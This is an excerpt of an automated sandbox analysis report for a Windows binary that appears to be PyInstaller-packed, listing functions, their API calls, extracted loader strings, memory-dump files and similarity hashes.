Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 878d768df1f538f7e01a6c76eb0b36c92f901ec61f80957981fa6f84d35cfa83
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: F222A165A0DB1796FB55BB55A8503B8A3A0AF0C745FC41535C83E0A2E0FFBCB14992F2

Function 00007FF7FD7376B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7FD7376C7
GetLastError.KERNEL32 ref: 00007FF7FD7376D9
GetProcAddress.KERNEL32 ref: 00007FF7FD737715
GetLastError.KERNEL32 ref: 00007FF7FD737727
GetProcAddress.KERNEL32 ref: 00007FF7FD737740
GetLastError.KERNEL32 ref: 00007FF7FD737752
GetProcAddress.KERNEL32 ref: 00007FF7FD73776B
GetLastError.KERNEL32 ref: 00007FF7FD73777D
GetProcAddress.KERNEL32 ref: 00007FF7FD737799
GetLastError.KERNEL32 ref: 00007FF7FD7377AB
GetProcAddress.KERNEL32 ref: 00007FF7FD7377C7
GetLastError.KERNEL32 ref: 00007FF7FD7377D9
GetProcAddress.KERNEL32 ref: 00007FF7FD7377F5
GetLastError.KERNEL32 ref: 00007FF7FD737807
GetProcAddress.KERNEL32 ref: 00007FF7FD737823
GetLastError.KERNEL32 ref: 00007FF7FD737835
GetProcAddress.KERNEL32 ref: 00007FF7FD737851
GetLastError.KERNEL32 ref: 00007FF7FD737863

Strings

Tcl_FindExecutable, xrefs: 00007FF7FD737736, 00007FF7FD737758
Tcl_GetString, xrefs: 00007FF7FD737A9D, 00007FF7FD737ABF
Tcl_ConditionNotify, xrefs: 00007FF7FD73795B, 00007FF7FD73797D
Tcl_SetVar2Ex, xrefs: 00007FF7FD737B27, 00007FF7FD737B49
Tcl_Init, xrefs: 00007FF7FD7376C0, 00007FF7FD7376DF
Tcl_DeleteInterp, xrefs: 00007FF7FD7377EB, 00007FF7FD73780D
Tcl_DoOneEvent, xrefs: 00007FF7FD737761, 00007FF7FD737783
Tcl_ThreadAlert, xrefs: 00007FF7FD7379E5, 00007FF7FD737A07
Tcl_Finalize, xrefs: 00007FF7FD73778F, 00007FF7FD7377B1
Tcl_CreateInterp, xrefs: 00007FF7FD73770B, 00007FF7FD73772D
Tcl_EvalEx, xrefs: 00007FF7FD737BB1, 00007FF7FD737BD3
Tcl_EvalObjv, xrefs: 00007FF7FD737BDF, 00007FF7FD737C01
Tcl_GetVar2, xrefs: 00007FF7FD737A13, 00007FF7FD737A35
Tcl_CreateThread, xrefs: 00007FF7FD737819, 00007FF7FD73783B
Tcl_Alloc, xrefs: 00007FF7FD737C0D, 00007FF7FD737C2F
Tcl_MutexUnlock, xrefs: 00007FF7FD7378D1, 00007FF7FD7378F3
Failed to get address for %hs, xrefs: 00007FF7FD7376E8
Tcl_GetObjResult, xrefs: 00007FF7FD737B55, 00007FF7FD737B77
Tcl_MutexFinalize, xrefs: 00007FF7FD7378FF, 00007FF7FD737921
Tcl_JoinThread, xrefs: 00007FF7FD737875, 00007FF7FD737897
Tcl_ConditionFinalize, xrefs: 00007FF7FD73792D, 00007FF7FD73794F
Tcl_ThreadQueueEvent, xrefs: 00007FF7FD7379B7, 00007FF7FD7379D9
GetProcAddress, xrefs: 00007FF7FD7376EF
Tk_GetNumMainWindows, xrefs: 00007FF7FD737C97, 00007FF7FD737CB9
Tcl_NewByteArrayObj, xrefs: 00007FF7FD737AF9, 00007FF7FD737B1B
Tcl_FinalizeThread, xrefs: 00007FF7FD7377BD, 00007FF7FD7377DF
Tcl_GetCurrentThread, xrefs: 00007FF7FD737847, 00007FF7FD737869
Tcl_Free, xrefs: 00007FF7FD737C3B, 00007FF7FD737C5D
Tcl_ConditionWait, xrefs: 00007FF7FD737989, 00007FF7FD7379AB
Tk_Init, xrefs: 00007FF7FD737C69, 00007FF7FD737C8B
Tcl_MutexLock, xrefs: 00007FF7FD7378A3, 00007FF7FD7378C5
Tcl_EvalFile, xrefs: 00007FF7FD737B83, 00007FF7FD737BA5
Tcl_NewStringObj, xrefs: 00007FF7FD737ACB, 00007FF7FD737AED
Tcl_SetVar2, xrefs: 00007FF7FD737A41, 00007FF7FD737A63
Tcl_CreateObjCommand, xrefs: 00007FF7FD737A6F, 00007FF7FD737A91

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: 46c08bb4b65a741d94941c9c34280f0023899d77a03d054d15cfe9801fd4a57e
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: 48029E20A0EB07D1EB54BB55A8647B4A3A1AF0C755FC41535D83E0A2E0FF7CB58992F2

Function 00007FF7FD7381C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7FD739400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FD7345E4,00000000,00007FF7FD731985), ref: 00007FF7FD739439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7FD7388A7,?,?,00000000,00007FF7FD733CBB), ref: 00007FF7FD73821C

Part of subcall function 00007FF7FD732810: MessageBoxW.USER32 ref: 00007FF7FD7328EA

Strings

\, xrefs: 00007FF7FD738251
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7FD738363
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7FD7382C9
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7FD738230
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7FD7381F3
%.*s, xrefs: 00007FF7FD7382FC
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7FD73828D
CreateDirectory, xrefs: 00007FF7FD73836C

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: 8d65f5b74349fa48aa9fd58c35f9d0f07ba0e431a2d592abd1e5121bd0e7f14c
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction Fuzzy Hash: 25517E11A1CA4281FB50BB25E8553BAE250AF9C780FC44431E92E8F6D5FEBCE50993F0

Function 00007FF7FD732180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7FD7321AB
SelectObject.GDI32 ref: 00007FF7FD7321F2
DrawTextW.USER32 ref: 00007FF7FD732215
SelectObject.GDI32 ref: 00007FF7FD73222B
ReleaseDC.USER32 ref: 00007FF7FD73223B
MoveWindow.USER32 ref: 00007FF7FD73228B
MoveWindow.USER32 ref: 00007FF7FD7322CB
MoveWindow.USER32 ref: 00007FF7FD73231E
MoveWindow.USER32 ref: 00007FF7FD732366

Strings

P%, xrefs: 00007FF7FD7321FF

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 6d9520f9c258784b8239faf7fca53da3c50ba111051397c29fbe88f4ef99255c
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: B051E626608BA186D7349F26A4182BAF7A1F79CB61F404121EFDE43694EF3CD045DB70

Function 00007FF7FD7380B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7FD7380EF
GetWindowLongPtrW.USER32 ref: 00007FF7FD73816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF7FD738182
GetLastError.KERNEL32 ref: 00007FF7FD73818C
SetWindowLongPtrW.USER32 ref: 00007FF7FD7381A3

Strings

Needs to remove its temporary files., xrefs: 00007FF7FD738175

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: d23d6a378258dc5d73f81dca3d0d388f0e3827ef8e79cdf9673abb1b4d59b59a
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 6E217121B0CA4282E7556B7AA854379E250EF8CB90FD84235DA3D4B3D4FE6CD59082F2

Function 00007FF7FD746300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD746343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD746730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7469CC

Strings

:, xrefs: 00007FF7FD7464FC
p, xrefs: 00007FF7FD74646D
-, xrefs: 00007FF7FD7463D9
f, xrefs: 00007FF7FD746465
p, xrefs: 00007FF7FD7463F5

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 3d73d43cd60d2034db2d3d4c8b61041713004188a47b05be754d19e8466f903c
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 27128062A0D153C6FB227A1491582FFF691FB4A750FC48435D6A94A6C4FB7CE5808BF0

Function 00007FF7FD741038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD741078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD741440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7FD7416DF

Strings

p, xrefs: 00007FF7FD74111D
f, xrefs: 00007FF7FD741110
f, xrefs: 00007FF7FD7412C5
f, xrefs: 00007FF7FD74117A
p, xrefs: 00007FF7FD741182

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 1a77991d0504e1057c64ebf9f8005b1fc3d4303c93f8110242d53548905f1d87
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 04127323E0C143C6FB22BA15E058679F261FB56754FD84035EAA94A9C4EF7CE4808BF1

Function 00007FF7FD731050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF7FD731098
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7FD731108
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7FD7311F6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7FD7310CC
fread, xrefs: 00007FF7FD7311FD
fseek, xrefs: 00007FF7FD7310D3
malloc, xrefs: 00007FF7FD73110F

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: c7183492b4d223ab4fe5a600607e61c8495d33bef924213809dcf9fb4ccde569
Instruction ID: 81deca132e6a89384421323cc54a89990fe7bcf489958d6de13b7b7c836ae78b
Opcode Fuzzy Hash: c7183492b4d223ab4fe5a600607e61c8495d33bef924213809dcf9fb4ccde569
Instruction Fuzzy Hash: 34413822A0C65286EB11FB12E8046B9E391BF49B84FC44432ED6D0B7D6EE7CE50597F0

Function 00007FF7FD731470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF7FD73149F
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7FD731518
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7FD7315DF
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7FD7314DE
fread, xrefs: 00007FF7FD7315E6
fseek, xrefs: 00007FF7FD7314E5
malloc, xrefs: 00007FF7FD73151F

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: a7c237dce644c07b9a59283466943b5db4a6612ad6d451b07fca56e22f09f00f
Instruction ID: 585b39b4a7627fc7ec6a698c14d520df9601130e09ae0d97dcbdef715de6f098
Opcode Fuzzy Hash: a7c237dce644c07b9a59283466943b5db4a6612ad6d451b07fca56e22f09f00f
Instruction Fuzzy Hash: ED415E22A0C64285EB11EB2294416B9E390BF4D794FC44432ED6D0BBD9FE7CE50197F1

Function 00007FF7FD73EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7FD73EAD5

Part of subcall function 00007FF7FD73FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF7FD73FA6F
Part of subcall function 00007FF7FD73FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7FD73FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7FD73EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7FD73EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7FD73EF08

Strings

csm, xrefs: 00007FF7FD73EBD0
csm, xrefs: 00007FF7FD73EB56
csm, xrefs: 00007FF7FD73EAEF

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 405bab1113e46f391c02fb9ba08d51ff5b23fd4d38c7f41e995020fd2b98d4aa
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 10D1B03290C74186EB20AB65D4403ADB7A0FB49798F900235EE9D5BBD5EF79E080D7E0

Function 00007FF7FD732C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FD733706,?,00007FF7FD733804), ref: 00007FF7FD732C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7FD733706,?,00007FF7FD733804), ref: 00007FF7FD732D63
MessageBoxW.USER32 ref: 00007FF7FD732D99

Strings

[PYI-%d:ERROR] , xrefs: 00007FF7FD732CA6
Error, xrefs: 00007FF7FD732D8C
<FormatMessageW failed.>, xrefs: 00007FF7FD732D70
%ls: , xrefs: 00007FF7FD732D22

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

Associated: 0000000A.00000002.2119733993.00007FF7FD730000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119792103.00007FF7FD75B000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD76E000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119822793.00007FF7FD772000.00000004.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD774000.00000002.00000001.01000000.0000002D.sdmpDownload File
Associated: 0000000A.00000002.2119870700.00007FF7FD779000.00000002.00000001.01000000.0000002D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff7fd730000_chos.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 35bb82533e2c1dfff7862c3112ec57a863d88aad0e4e0eabfe6ea5d1b00e1e52
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: F831B72270CB4142E720BB25A8042BAA695BF8C798F804136EF5D5B799FE3CD506C7E0

Function 00007FF7FD73DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7FD73DFEA,?,?,?,00007FF7FD73DCDC,?,?,?,00007FF7FD73D8D9), ref: 00007FF7FD73DDBD
GetLastError.KERNEL32(?,?,?,00007FF7FD73DFEA,?,?,?,00007FF7FD73DCDC,?,?,?,00007FF7FD73D8D9), ref: 00007FF7FD73DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF7FD73DFEA,?,?,?,00007FF7FD73DCDC,?,?,?,00007FF7FD73D8D9), ref: 00007FF7FD73DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF7FD73DFEA,?,?,?,00007FF7FD73DCDC,?,?,?,00007FF7FD73D8D9), ref: 00007FF7FD73DE63
GetProcAddress.KERNEL32(?,?,?,00007FF7FD73DFEA,?,?,?,00007FF7FD73DCDC,?,?,?,00007FF7FD73D8D9), ref: 00007FF7FD73DE6F

Strings

api-ms-, xrefs: 00007FF7FD73DDDD

Memory Dump Source

Source File: 0000000A.00000002.2119757665.00007FF7FD731000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FF7FD730000, based on PE: true

